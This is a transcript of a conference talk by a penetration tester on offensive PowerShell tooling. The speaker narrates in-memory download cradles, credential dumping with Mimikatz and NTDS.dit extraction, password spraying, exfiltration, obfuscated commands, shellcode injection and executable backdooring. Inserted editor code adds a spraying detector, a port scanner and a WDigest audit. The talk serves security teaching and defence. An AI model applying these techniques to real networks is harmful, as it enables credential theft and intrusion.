
Hey guys, if you want to scoot up, there's a lot of console output you probably can't see from way back in the back. I'll save you the eyestrain, or you can look at the slides later if you don't care to see the console output. Eric especially, if you're short like Eric, you might want to scoot up. Thanks for coming out and listening to me talk. I've given this talk once before at ETSU. I don't know if any of you guys are from ETSU; if you are and you've heard this talk before, you might want to go to the other one, because you've probably already heard this. If not, I've got lots of great stuff in store for you.

A little bit about myself. That's me, that's my pretty picture, my glamour shot. I'm an analyst at Sword & Shield. I'm also a member of the Tennessee National Guard, I'm working on my master's degree through SANS, and I've got two kids and just one wife right now. If you want to get a hold of me, this is my personal email and my Twitter handle. I really don't use Twitter too often, but feel free to email me about anything you ever want to talk about. I'd be glad to answer and respond; I'm a pretty open guy.

I like to give a little bit of a disclaimer before I get started: no matter how smart I think I am, I don't actually know everything, so if you find a technical inaccuracy in what I have to say, just let me know and we can talk about it. Please don't expect me to be perfect, I wouldn't expect that of you, but I'm just letting you know I could have gotten something wrong.

Here's a brief outline of what we're going to talk about today. We're going to go over a little bit of PowerShell, give you a little background information, and I'm going to talk a lot about attack tools. It's probably pretty heavy on the attack tools because that's what I use on a day-to-day basis. Then I'm going to move into a little bit about malware, a little bit about forensics tools, and then I'm going to close up with ways you can block these attacks or defend against them. Also, real quick: my slides will be available on Sword & Shield's blog afterwards, and my slides have tons of notes and reference links where you can get all this content, so if I go through this stuff quickly and you don't get the chance to write it down or take pictures, it'll all be available later.

Here's the definition of PowerShell; I pulled it off of a website. Do we have any programmers in here who have ever programmed anything in batch or written a batch script? Yeah, we've got some. Anyone else? There you go, sir, you in the back. Well, anyway, if you've written anything in a batch script before, you know how awful it is, especially compared with today's modern programming languages. PowerShell is beautiful for many reasons, and these are the reasons why. As you know, it's Microsoft's new, updated version of the old DOS prompt. It can do a lot of things. It's primarily built on the .NET framework and you use it to interact with the Windows API. Everything works off of verb-noun completion, so if you want to do something like get help, you just type the words Get-Help: the verb, the noun, and what it is you want to do. It has tab completion, which is always great, especially if you're coming from Linux or anything like that that has it, and it's stuff in your path. You can alias any command you want. How many of you have ever been in a Linux command prompt and typed ls? Yeah. With PowerShell, guess what, it works, because they aliased the command over, so you can straight up hit ls in PowerShell and it will give you a listing. You can alias any command that you want.

But one of the good things about PowerShell is that everything comes out as objects. If you've done any object-oriented programming of any sort, PowerShell works on objects, so you can literally craft up your own object or you can use the built-in objects that they have, and you can do smart things with the data when you get an object back, as opposed to the old command shell where you just get text strings spewed onto your monitor; that's all you get. PowerShell has actual structures; you can build your own or use the ones they've got. Syntax highlighting is available in version 5; it looks like that with the yellow, and in lots of slides later you'll see green and gray and all kinds of other stuff.

PowerShell has been around for a long time. It came default on Vista; you probably didn't know it was there, and you could install it on XP if you wanted to, but please don't use XP. It's been around, I think, coming up on its 10-year anniversary here soon. Version 5 is the newest release; version 5 came on Windows 10, and you can upgrade your past versions up to version 5 now. A PowerShell script ends in .ps1. Those things are not clickable; you can't double-click and run a PowerShell script like you can a shell script or something like that. You actually have to run it from the command prompt. Microsoft intentionally did that so you can't double-click and run a script. You can also set up a module, which, in layman's terms, is like a function or a class: you can put all your other stuff in there and use the PowerShell module. PowerShell also comes with the Integrated Scripting Environment, so you can open up the IDE, as it were, to mess with your PowerShell programs. And one of the other cool things: you can straight compile a PowerShell script to an exe if you want to and distribute it out that way, if you don't want people to see your source code.

Here's an example of the verb-noun again: here's Get-Help. I got help on the command Get-Alias and this is what it looks like. These things are called cmdlets, and so Get-Help is a cmdlet. There's tons of information; most people that write scripts document really well, so gone are the days where you can't figure out what's going on or how you run a tool. Most PowerShell cmdlets are pretty good with that. You can pipe the data structures around; that's what I was doing here. I did a Get-Process, which got me a list of all the processes, and then I piped it to a cmdlet called Get-Member. Get-Member is really nice, because if you ever have an object and you think, great, I've got an object, now what am I going to do with this thing? Well, Get-Member tells you that this object has methods and properties and aliases and events and all kinds of stuff, so you can figure out how you're going to use this object for whatever it is you're going to do with it. And I just limited it to ten items.

Some of the good use cases for PowerShell, again, like I said earlier: it's integrated in Windows, and everyone's using it for everything. In fact, if you get Server 2016 Nano, I believe it is, it has no GUI; you have to interact with it through PowerShell only. One of the ways you do that is through PS remoting, which is like SSH, but it's Microsoft's own way of doing things, and with PS remoting you can run one command across your whole network from one workstation. But that wasn't good enough: Microsoft's participating in the OpenSSH project and they said they're going to have OpenSSH integration here soon. And then antivirus uses it, malware writers use it, red team people use it. One of the better things about it is it has in-memory code execution, which I'll touch on here in a minute.

Here's an example of PS remoting. Like I said, I've got a lot of screenshots. I had a laptop that I was going to use to show you guys some stuff on the VMs, except my laptop's like 20 years old, it only has VGA output, and my boss won't buy me a new one, so I had to use the slide deck. This is an example of PS remoting to another computer. It's like using SSH; I just connected to another computer over there, and you can see once you remote over to the computer it puts the hostname out so you know which computer it is you're connected to.

There's four ways to load scripts, or to use scripts, in PowerShell. Actually, there's three ways. The top one is the execution policy. Have any of you guys heard of the PowerShell execution policy? Not too many. IT people think that it's a security boundary, because if it's set to signed only, then they think that you can't run PowerShell scripts. Try and run one the very first time on a computer and it'll say that you can't run it because you're not authorized, so you change the execution policy to unrestricted or signed or whatever. But that can be changed by anybody, and as if that wasn't enough, you can just tell it, hey, let's bypass the execution policy for now, and PowerShell will let you do that and you can just continue on. One of the ways is you can import a module with the Import-Module cmdlet; there's an example of Import-Module. Or you can use dot sourcing, which is just a dot and then the path to the PowerShell script, and it'll pull it all into memory in that session you have there. There's one other way, a real popular way amongst attackers. Anybody happen to know what the other way is? No? Well, you don't know because I'm going to show you: it's the IEX download cradle. This thing is very important for you to pay attention to; you'll see this used over and over and over everywhere in all my slides. IEX is a short alias for Invoke-Expression, and what this does is it creates a web object and then it downloads your PowerShell script from wherever: you can download it from the internet, you can download it from another machine, you can download it from SMB, and then it pulls it into memory. So this PowerShell script right here, and any malicious ones that I have, never touch the disk. From a PowerShell session I'll go out to the internet, I'll grab the script that I want and pull it into memory. Forensically there's nothing on the computer for you to know that I pulled that script in there. And here's an example of me pulling the script down and then executing it; the details are on there.

Here's some of the tools that I'm going to go over. The list looked quite a bit longer, and as I started building my presentation I didn't have enough time to get it all in there; you probably don't want to sit here for three hours. So I took some of the tools off, but these are the attack tools that I'm going to go over. How many of you guys have heard of Mimikatz? Mimikatz is a really great tool; I'll show you a little bit more about that later. This one here is called PowerMemory. Those of you that are familiar with Mimikatz, does anybody know what version of Windows it won't work on by default? No? Well, Microsoft put some protections in place in Server 2012 and Windows 10 and 8.1 that keep Mimikatz from running; you can make a registry change and reboot the machine. But anyway, this program here, PowerMemory, does a lot of things, but the primary use case for it is getting a dump of LSASS, which stores those credentials in it, and it'll work all the way up to Windows 10. It doesn't care what your operating system is; you can grab clear-text credentials out of memory from any computer. One of the ways it does this is that it uses Windows-signed binaries, so again there's no other tools on the disk that are kind of weird; you just use straight-up Microsoft tools and you've got a copy of the memory. Here's an example over here: this is the main screen when you run the tool, and then this one over to the right was me extracting the memory from my own computer, which was a Windows 10 computer. Those are the steps that it went through. Notice down towards the bottom, if I want to exfiltrate data, you can have it send your stuff to Pastebin if you want, so that way you can set up a private repo that's not open to the public, but it'll just exfiltrate it straight out for you. And there's an example; there's my password, please don't use it, that's my super strong one. This again was on a Windows 10 computer and this is what it looks like.

I forgot to mention earlier: for all the tools that I'm talking about, the light grey text underneath the tool name has the tool author, their Twitter handle if I knew it, and a place where you can get the tool if you wanted to use it. I'm trying to give attribution where it's due to all the people that wrote these tools.

Another set of tools is called PowerShell AD Recon, by Sean Metcalf. He's really big in the PowerShell space; he actually gave a talk very similar to this one recently, and he develops a lot of tools as well. This tool set is used for interacting with Active Directory, like the title says, and gathering information. Some of the scripts of note are the discovery of interesting services, Exchange servers and SQL servers. Those of you that work with Active Directory, are you familiar with SPNs, service principal names? You can ask a domain controller for its available services without actually running an nmap scan on the network. You just tell the domain controller, hey, tell me where all your SQL servers are, and it will answer you back with that; you don't have to do any nmap scan or whatever, so these tools are good for that. Here's an example up here in my lab network (we're talking about Skynet taking over; I'm on my way to making that happen in the network I've got set up at work). This one up here, again, I asked the domain controller with this tool, tell me where the SQL servers are, and this one down here in the bottom right-hand corner, I said tell me where the service accounts are. The service accounts are of special note, because typically on a network people will set their user accounts to change passwords regularly, but they won't change their service accounts. Then in another attack that I don't really go into detail on here, I can grab a Kerberos ticket for all the service accounts and then just go to town cracking them, and if it takes me two months, that's cool, because your password is still going to be the same however long it takes me to crack it. I can use Kerberos to grab a ticket and then crack the password of the service account; it will take longer, and then use it later. So that's why that one is interesting: finding all those service accounts on the network so I know what to target next.

If you've ever made your way to another computer and you needed some tools that weren't there, again, you can use FTP without having to download a client; you can just use this PowerShell FTP script. Here's an example up here of me setting up the connection, and then I just made the connection over. These things come in handy if you're trying to exfiltrate data and get things off the network or from another computer.
The DSInternals PowerShell module: those things are great as well. This guy has written a ton of functionality in his tool set. PowerShell version 5 also comes with something similar to what you may know from Linux. Are you guys familiar with the apt package manager or the yum package manager in Linux? Windows PowerShell version 5 has something very similar. One option is called NuGet, and the other one is called... I can't remember the actual command, but you can straight up say install the DSInternals module and it'll go out to the repository and get it from the command line, kind of like apt does. You don't have to download and install any of that kind of stuff; that's a PowerShell version 5 thing. But anyway, these are some of the scripts he has, the functionality in there, and again I'll go over a couple of screenshots of them. Notice up in the upper right corner it talks about converting hashes: if you know a password and you want to try and pass the hash across the network, you can give it the clear-text password and then create the hash so that you could pass it around. But one of my favorites: I love the NTDS.dit file. I'm not sure if you guys know it; most of you talked about it, actually David, you talked about it earlier in your home lab about how you extracted it with CrackMapExec. Here is another way to do it with a PowerShell-only tool. First you've got to get a copy of the key, then you add that to an object in PowerShell, and then you come down here and you just use this tool from the DSInternals suite and it will extract all the stuff from the NTDS.dit file. It actually gives you back an object that contains all the information about the user. I didn't show it here because it's really long, so there's a lot of information associated with the user, but some of those things are notes or comments that are typed in about the user, or, let's say, their past ten password hashes are in there. So again you get back an object out of PowerShell that you can do something with; you can automate and script and do lots of things with it after that. This one down here also: after I pulled everything out of the .dit file with this module, it has another nice script that will put it out in hashcat format so you can send it straight to your cracker; it has one for John the Ripper as well. So that comes in handy. Right now if you use any of the other tools you have to kind of format your text file for whichever password cracker you're going to use, but this one has it built right in: pipe the object to it and it'll spit out the formatting.

Another great tool is from darkoperator. It has a ton of functionality; I'm not going to go over all of it. You can see I tried to list it all here. It's great for, basically, once you get on a box in a network you can just start enumerating the network. You want to find sensitive files? There you go. Network shares, it can do a ping sweep, it looks like it'll do VirusTotal hash analysis. The nice thing about this is someone wrote all of this functionality in PowerShell, how to do all these things, so you don't need to again put custom binaries down. PowerShell is technically a scripting language, so again you just pull these scripts down that do all kinds of stuff for you, and I'm just showing you the functionality you get with it. When you get access to a remote machine, for me, because I'm an attacker, my tools aren't necessarily on the computer that I compromised, and historically you might upload your own binaries, and when you do, they'll get flagged by AV and then you lose. But with this method you don't have to worry about that: connect to your computer, use PowerShell, download my tool into memory, and the computer's none the wiser that my tools are there doing their thing.

Do you guys here use OWA, or are you familiar with OWA? OWA is great for us when we're doing external assessments because it provides an interface to interact with Active Directory, because they're typically using Active Directory creds, and it's a good way to do password spraying. Anybody know what password spraying is? Brute-forcing is where you hit one user account with multiple passwords over and over. Password spraying is the inverse: I know all the user accounts and I just try one password across all of them. So if I use something like theHarvester or anything else to scrape your organization's email accounts, I now have a full list of user names, and I can take that set of user names and use something like this OWA toolkit to launch a brute-force attack against all the user names with one password. A good one right now would be something ending in 2016; that's guaranteed to give me at least one hit, and frankly that's all we need, just one connection. After that, and if that wasn't good enough for you, again this is all external, from the internet; this isn't required to be local on the network for this tool. I can use it to download a copy of your address book, the GAL, the global address list, off your email server once I have valid creds; you have to have valid creds first, but this is a good tool for that. Here are some of the other modules that it has in there. You can use this PowerShell script to just straight write a message; you can see that last command down at the bottom, I can write email from PowerShell and just turn around and send it out.

Anybody know what the Swiss Army knife of network security is? Netcat, yeah. Well, someone put it in PowerShell, which is great. Again, netcat's a binary I'd have to put on your box; this isn't a binary, I don't have to do that. Again, here's the IEX download string I was talking about earlier. I get connected to your computer, I don't have my tools out there, so what do I do? I just download it from the internet. This one I actually had on a local computer, but you can get it from wherever it's at, download it, it's in memory, then you can use it. So what I did here was set up a bind shell listening, and it was going to give back PowerShell afterwards, and there's an example of connecting with netcat on my attacker machine over to that bind shell, and as you notice I got the PowerShell terminal right off the bat, so that's always nice as well.
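The password spraying pattern described above, one password across many accounts versus many guesses against one account, as an added defensive example that is not from the talk: a classifier that labels each source in a set of failed-logon records. The record format, the thresholds and the log lines are constructed assumptions, not a real Windows event layout.

```python
"""Separate password spraying (one password across many accounts) from brute
force (many guesses against one account) in failed-logon records (added
example; the records below are constructed, not from the talk)."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple


class FailedLogon(NamedTuple):
    time: datetime
    user: str
    source: str


def parse_line(line: str) -> FailedLogon:
    """Parse the constructed record format (not a real Windows event layout):
    '<ISO timestamp> LOGON_FAILURE user=<name> src=<ip>'."""
    stamp, event, user_kv, src_kv = line.split()
    if event != "LOGON_FAILURE":
        raise ValueError(f"unexpected event type: {event}")
    return FailedLogon(datetime.fromisoformat(stamp),
                       user_kv.split("=", 1)[1], src_kv.split("=", 1)[1])


def classify_sources(events: List[FailedLogon],
                     window: timedelta = timedelta(minutes=30),
                     min_users: int = 5, max_per_user: int = 2,
                     brute_threshold: int = 6) -> Dict[str, str]:
    """Slide a time window over each source's failures and label the source.

    A spray shows many distinct accounts with only a guess or two each (the
    attacker stays under the lockout threshold), while brute force piles many
    guesses onto one account. The thresholds are constructed tuning values.
    """
    by_source: Dict[str, List[FailedLogon]] = defaultdict(list)
    for ev in events:
        by_source[ev.source].append(ev)
    verdicts: Dict[str, str] = {}
    for source, evs in by_source.items():
        evs.sort(key=lambda e: e.time)
        start = 0
        for end in range(len(evs)):
            # Advance the window start so that evs[start:end+1] spans <= window
            while evs[end].time - evs[start].time > window:
                start += 1
            per_user = Counter(e.user for e in evs[start:end + 1])
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                verdicts[source] = "password_spray"
                break
            if max(per_user.values()) >= brute_threshold:
                verdicts[source] = "brute_force"
                break
    return verdicts


def classify_log(lines: List[str]) -> Dict[str, str]:
    """Parse raw lines and classify every source that appears in them."""
    return classify_sources([parse_line(line) for line in lines])


# Constructed sample log (not real data).
SAMPLE_LOG = [
    # six accounts, one guess each, from one host within half a minute: a spray
    "2016-10-01T09:00:00 LOGON_FAILURE user=alice src=10.0.0.5",
    "2016-10-01T09:00:05 LOGON_FAILURE user=bob src=10.0.0.5",
    "2016-10-01T09:00:10 LOGON_FAILURE user=carol src=10.0.0.5",
    "2016-10-01T09:00:15 LOGON_FAILURE user=dave src=10.0.0.5",
    "2016-10-01T09:00:20 LOGON_FAILURE user=erin src=10.0.0.5",
    "2016-10-01T09:00:25 LOGON_FAILURE user=frank src=10.0.0.5",
    # one account hammered from one host: brute force, not a spray
    *[f"2016-10-01T10:00:{i * 5:02d} LOGON_FAILURE user=bob src=10.0.0.9"
      for i in range(6)],
    # a user mistyping twice: noise, no verdict
    "2016-10-01T11:00:00 LOGON_FAILURE user=grace src=10.0.0.7",
    "2016-10-01T11:00:30 LOGON_FAILURE user=grace src=10.0.0.7",
]

if __name__ == "__main__":
    for source, verdict in classify_log(SAMPLE_LOG).items():
        print(f"{source}: {verdict}")
```

To run this over real data, replace parse_line with a parser for your own failed-logon source (for example the account name and source address fields of Windows event 4625) and tune the thresholds to your lockout policy.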
Did you guys see my talk last year on WPAD or NetBIOS spoofing? Honestly, it's my favorite way to attack a network. I used to roll into a network and do a vulnerability assessment first; now I just go in and start spoofing names and collecting hashes right off the bat. I don't even waste my time trying to find other vulnerabilities. I use the tool called Responder, which is Python, and which David also talked about in his talk; it's a great tool, I love using it. This one is packed with the same stuff as Responder, but it's written in PowerShell. It's called Inveigh, and it does the same thing: it listens on the network for NetBIOS traffic or link-local multicast name resolution traffic and it spoofs responses to it, and then people will send back their hashes, and then you can start trying to crack the password hashes from there. Again, this is great especially for trying to pivot: I've compromised a machine in the DMZ, I don't want to upload my own tools, I can't run Responder on that domain controller that I just got to, so instead I will just upload this with the IEX download cradle into memory and I will run my own NetBIOS spoofer straight from that computer instead. Down here is an example of me capturing two HTTP NTLM hashes coming back. I'd have to crack them, but trust me, typically there's always going to be at least one password that cracks, and we only need one to kind of go on.

All right, PowerTools. This is one of my favorites. I've got a secret man crush on Will Schroeder; he wrote a lot of the tools that I talk about. He's one of my favorite guys when it comes to PowerShell, especially offensive tools. PowerTools has all of these tools in it. I personally have not used PewPewPew or PowerBreach. I have used PowerPick. PowerPick is, I think, C#, but it might be C++; it says on there. It's either C# or C++, but it's a way to execute PowerShell in a compiled language like C#, and it's not a tool you can actually download and run; you have to download it into Visual Studio and use it to compile your code, but it's a way to run PowerShell commands from an executable. PowerUp, again: Andrew, my coworker, is going to talk on privilege escalation across the way. PowerUp does that. It's one PowerShell script; again, IEX download cradle once I've compromised the machine, pull it down, and it does all the privilege escalation checks for you. It checks for unquoted service paths and places that you can write to and services that you can change, and it gives you a nice little report when you're done. So gone are the days of, oh, I have to manually go through and do a process list and see what the service paths are and see if I can change any of them. Just run this PowerUp script and it will tell me my methods for being able to escalate my privileges. And to top that off, it'll tell you where it's done, and then you can just run another cmdlet to actually do it for you. So it'll say this service has an unquoted service path, and if you run this command it will go ahead and replace that command with your own service path and your binary, and you're good to go.

But my all-time favorite is PowerView. If I've ever worked with any of you before, you'll know we talked about PowerView. PowerView is a beautiful tool, and I'm about to show you why. This can actually be used by blue teamers on a network; I think there's a practical application for that as well, but I've typically used it as a red teamer. The layout that I did here: the bold text is the category and below are some of the functions in that category. The number indicates the total number of modules; I didn't want to list them all out here, I just wanted to highlight some of the better ones. I'll get into some screenshots here to actually show them, but as you can see there's a ton of functionality going on in here. One of our particular favorite ones is user hunting, which I'll get into in a second.

All right, here's an example of PowerView. PowerView does require me to have one set of valid domain user creds. So typically when I start an engagement, I connect my computer to your network and I'm not a domain-joined machine, I don't have any domain user accounts, nothing like that. So then I'll do stuff like the WPAD or Inveigh broadcast spoofing, get some hashes back, crack one, and then all these commands that you'll see run in PowerView can be run as any normal user. They don't have to be an admin user or anything of the sort; just a normal user account works to do everything. Essentially what it's doing in the background is asking Active Directory a ton of questions, and it puts the answers into PowerShell objects that you can do stuff with. So for this one I wanted to know the domain SID, which is probably pretty boring, but if you ever wanted to brute-force the domain admin account and they happen to have changed the username from Administrator to something else, this is how you can find out what it is. The administrator account on every computer ends with a RID, or relative identifier, and anybody know what that number is? All administrators end in 500, that's right. So I got the domain SID, I put -500 on it, and I found out that on this domain the domain administrator's name is super admin, not admin. So that was handy for me to use PowerView, again from a normal user. Over here I wanted to find out stuff about users, so I just sent a query over and AD told me all this stuff. What's interesting here is you notice I asked for the description field that's in Active Directory; if you look down here, there's a bunch of passwords. Some smart guy put all the passwords in the description comments in Active Directory. You'd laugh and say nobody would ever do that, but they do. I mean, I did this for my lab environment, but you'll be surprised what you can find scraping the comment sections of Active Directory user objects to see what kind of information you can get back. If you don't get passwords, you can get tons of other useful information at the very least. Again, here's just a user object back for the super admin; you can see there's tons and tons of stuff in there about it. For this particular engagement I wanted to know where the enterprise admins are; you know, domain admin, enterprise admin, that's the place I want to be. So I was like, I don't know who's in the enterprise admins, so again I used PowerView from a non-domain computer with a normal user account to find out who the enterprise admins were, and that's who they were. You can get some stuff about the GPOs or the domain policy. The top tells me the password policy; it allows me to do smart brute-forcing. If I know your password policy is seven characters and complexity is turned off, then I won't waste my time trying complex passwords; I'll probably try the password "password" and it'll probably work. Down here I get GPO information. Sometimes people save passwords in GPOs; that's a nice place to look. The way the GPO used to work, Microsoft has fixed it now where you can't do it, but you used to be able to push a GPO that would set a local admin password, and it was, I want to say, encrypted, I don't think it was encoded, I'm pretty sure it was encrypted, but then the key got put out for it, so that way anybody can decrypt the password from a GPO. Anyway, so I found out who the enterprise admins were and I wanted to know where they're logged in at, so then I used this part of PowerView called Invoke-UserHunter, and if you don't give it any flags it will automatically tell you where all the domain admins are logged in. I want to know which computers the domain admins are logged into so that I can try and break into that computer, because that's where I want to be, wherever the domain admins are. But that also works if you've got a buddy who's on the network somewhere and you want to know where he's logged in and his IP address: run Invoke-UserHunter, give it the username flag, and it will tell you where they're logged in at.
on to the next toolkit this one's called power sploit again same same thing with the module category and some modules that are in it it does a lot of neat stuff in here it's more of an attack tool you can do lots of cool things with that this tool power split actually holds what's called an oak Mimi cats it is a powershell implementation of mini cats so that way i can again run mimi cats on your computer without downloading any binaries onto your box i can just nail it in the memory of the i-x cradle the power tools that I talked about before the Power View and power up there now part of the power sploit
project that I started using them before they kind of merged and I still think of them as separate and I want to talk about them separate cuz I like Power View a lot but they're not actually part of this project I typically do a demo but this is an example of me creating shell code I just use the MSF venom and I created myself Windows payload that executed to open the calculator it's this cool thing that you do getting out here is that's the shell code then I got I got the name of a process I was looking for a process to inject my shell code into so I just asked for use PowerShell got the name with explore
process and using the invoke shell code which is part of how our spike I gave it basically at the process that I want to inject into and then all the shell code that I wanted to inject into and then using power spiders and checked with my shell code straight into another process on a box again all the memory all done through PowerShell no binaries touching the disk nothing as such what's that yeah oh yeah the Sun here do you wish to carry out your evil plans which is pretty funny I didn't mention this earlier PowerShell can take encoded and compressed commands so if you wanted to encode what you're gonna execute power shell for a little bit of application
you can take this thing up here I got the IEX download cradle and then I just used this power sploit module to encode it all this stuff you see here should be a bunch of base64 of the encoded command that I want to run and you can quite literally down at the bottom you see right here I ran PowerShell - II four encoded command and then my base64 string and it executes the command after when it's great for obfuscation so you don't know what I'm doing on your computer you just if you ever see me run that for some reason you happen to see it you would just see a bunch of base64 string now here's an example of a
Now here's an example of a keylogger from that module. You can use PowerSploit to do port scans. Again, I connect to a computer, I don't have any of my tools there, I can't exactly install nmap on your computer, but I can download this PowerSploit module into memory and then do a port scan on your network from there, using PowerShell only. And again, what's nice about it is it gives you back data objects. What you see down here at the bottom part is a data object with certain properties on it, and over towards where it says Where-Object alive equals true, I basically said only give me back the objects where the host was alive, I don't want the other objects back. But again, you can programmatically handle this data when you do a port scan and do lots of things, because you get back actual data objects you can do something with. Here's Invoke-Mimikatz I was talking about. If you guys haven't seen it before, it's great: it grabs clear text passwords out of memory no matter how strong they are. It can be a 30-character password, it'll grab it straight out of memory. Here's an example of it running. I used the short URL because it's a pain if you type the full path, but the Invoke-Mimikatz script is available on GitHub publicly, so you can just pull it from there every time you want to use it. You don't have to host it yourself anywhere; just pull it straight from their GitHub repo every time and then run it on the computer.
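[Editor's added example, not the PowerSploit module from the talk: a minimal TCP port scanner written so that every result is an object, which is the point the speaker makes about filtering with Where-Object. Function names, the port list and the 192.0.2.10 test address (RFC 5737, not routable) are the editor's.]

```powershell
# Editor's added example (not from the talk): a small object-returning port
# scanner, so results can be filtered in the pipeline instead of parsed as text.

function Test-TcpPort {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][int[]]$Port,
        [int]$TimeoutMs = 500
    )
    foreach ($p in $Port) {
        $client = New-Object System.Net.Sockets.TcpClient
        $open = $false
        try {
            # Async connect so a filtered port costs at most $TimeoutMs.
            $async = $client.BeginConnect($ComputerName, $p, $null, $null)
            if ($async.AsyncWaitHandle.WaitOne($TimeoutMs)) {
                $client.EndConnect($async)      # throws if refused
                $open = $true
            }
        } catch {
            $open = $false
        } finally {
            $client.Close()
        }
        [pscustomobject]@{ Host = $ComputerName; Port = $p; Open = $open }
    }
}

function Invoke-SimplePortScan {
    # One object per host: Alive if any probed port answered.
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,
        [int[]]$Port = @(22, 80, 135, 139, 443, 445, 3389)
    )
    foreach ($h in $ComputerName) {
        $results = Test-TcpPort -ComputerName $h -Port $Port
        [pscustomobject]@{
            Host      = $h
            Alive     = [bool]($results | Where-Object Open)
            OpenPorts = @($results | Where-Object Open | ForEach-Object Port)
        }
    }
}

# Constructed targets: the local machine plus an address that will time out.
$scan = Invoke-SimplePortScan -ComputerName '127.0.0.1', '192.0.2.10' -Port 135, 445, 3389

# Because these are objects, the filter the talk shows is one pipeline stage.
$scan | Where-Object Alive -eq $true | Format-Table -AutoSize
```

The same objects can be piped to Export-Csv, grouped by open port, or fed to another function; nothing has to be re-parsed from screen output.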
Last year I gave a talk where I talked about it quickly, and I just thought I'd note it again: using that PowerShell functionality I was able to do a big old PsExec loop in PowerShell. I basically sprayed the whole network with this loop, so I connected to every computer on the domain, ran a PowerShell command that downloaded Mimikatz into memory, got the passwords out and sent them to my SMB server, and I did that on like 200 computers on a network, all using PowerShell, and Mimikatz never touched a disk on a computer. So forensically you don't know that I ran Mimikatz on your computer. Here's the example of it running; I wrote a parser to handle the 200 outputs. Nishang is another great tool set. I don't spend much time with this one, not for any particular reason; I just find the tool sets I need in other things. But Nikhil Mittal, I think that's how you say his name, provides a lot of training on PowerShell too. He's really prominent in the PowerShell space and in his tool development. Same thing: the functionality is grouped, and there are some tools going on down here. You can do lots of neat things; there are some more modules on it. One of the nice things down here is this one, Invoke-MimikatzWDigestDowngrade. Earlier I told you that on Windows 8.1 and up and Windows Server 2012 you can't grab credentials out of memory; you've got to do what's called a WDigest downgrade, where you go set a registry setting and tell Windows to keep storing the password in memory. It's built into this tool: you can just run it and it will do it for you. Show-TargetScreen is nice. This guy wrote a PowerShell script that will stream somebody's desktop with MPEG across the network. So, you know, screenshots are cool, but I can stream your whole desktop like a movie.
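[Editor's added example, not from Nishang or the talk: the defender's side of the WDigest downgrade just mentioned. The downgrade works by setting the registry value UseLogonCredential under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to 1; this audits that value and offers the remediation. Function names are the editor's; the Sysmon reference in the comment is a suggestion, not something the talk covers.]

```powershell
# Editor's added example (not from the talk): audit and remediate the registry
# value that an Invoke-MimikatzWDigestDowngrade style tool flips.

$WDigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

function Get-WDigestStatus {
    $value = (Get-ItemProperty -Path $WDigestKey -Name UseLogonCredential `
              -ErrorAction SilentlyContinue).UseLogonCredential
    if ($null -eq $value) {
        $note = 'value absent: default off on 8.1 / 2012 R2 and later, on for older builds'
    } elseif ($value -eq 1) {
        $note = 'ENABLED: plaintext credentials kept in LSASS, treat as a downgrade'
    } else {
        $note = 'explicitly disabled'
    }
    [pscustomobject]@{
        Computer           = $env:COMPUTERNAME
        UseLogonCredential = $value
        Downgraded         = ($value -eq 1)
        Note               = $note
    }
}

function Disable-WDigestLogonCredential {
    # Needs admin. Setting 0 explicitly also covers Windows 7/2008 R2 with
    # the KB2871997 update, where the absent value still means "on".
    New-ItemProperty -Path $WDigestKey -Name UseLogonCredential `
        -PropertyType DWord -Value 0 -Force | Out-Null
    Get-WDigestStatus
}

Get-WDigestStatus
# To fix:  Disable-WDigestLogonCredential
# Any later write to this value is worth an alert (Sysmon event 13 on the key
# path, or registry object auditing), since it only changes when someone
# wants plaintext passwords back in memory.
```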
Using this thing, I'm going to sit there and watch you the whole time, as opposed to just taking screenshot, screenshot, screenshot. I can just stream it over the network, and he's written a blog post on how to do it; again, that's in my slides. Here's an example of me running one of his scripts. Windows is very nice and it will store your password for all the Wi-Fi networks that you've ever connected to. I don't know how many of you have had your laptop for a couple of years, but you can run this script on your victim and you can get all the Wi-Fi passwords for all the networks they ever connected to. Here's an example of me getting out the password to my iPhone Wi-Fi network, for when I tether my laptop to my phone: I ran this script on my Windows computer and pulled out the Wi-Fi password. That's great, especially if I catch you at Starbucks, compromise your machine, and I would like your corporate machine's or your corporate network's Wi-Fi password; I can grab all that information from one place. PowerShell-Suite is yet another set of tools. The two main ones I'll talk about here are Invoke-Runas and Subvert-PE. Earlier I talked about how I just need one set of valid user credentials even though I'm not on a domain-joined machine. I use a program called runas to do that; it allows me to impersonate a network user. I give it the username and password, and whenever I run a command it runs it as that user, just like the thing it's called. But if you ever find yourself in a company where they were trying to up the security and removed runas.exe from a computer, that's all right, somebody wrote it in PowerShell. You can just use this PowerShell Runas to do it all in PowerShell, or if you'd like to run all your tools from PowerShell without using the binary at all, just pull this thing down. Here's an example of me doing it, again using the IEX download cradle that I talked about over and over and over. What's interesting is this time I used an SMB connection. I'm pretty sure it will take any URI; I have only tried HTTP and SMB, I haven't tried any other URI, but you don't even have to connect over HTTP. If for some reason they have a web proxy but they let 445 out over the network, you can just make an SMB connection instead; you don't need to make HTTP. That's the example of me spawning a new shell as a different user. Subvert-PE is really nice. There's this thing called code caves: when someone compiles a program there's empty space in there for various reasons. Subvert-PE will go through, find a nice place and put your shellcode right in there, and that program will continue to run after the fact. So you can basically backdoor whatever executables you want, and you can use this PowerShell script to do it. So I told Subvert-PE the path I wanted to backdoor, notepad++.exe. I told it where the exe was, and it found a code cave and put my shellcode in there. Actually, by default it comes with its own, which just opens calculator, but you can go in and change the shellcode to whatever you want it to actually be. I
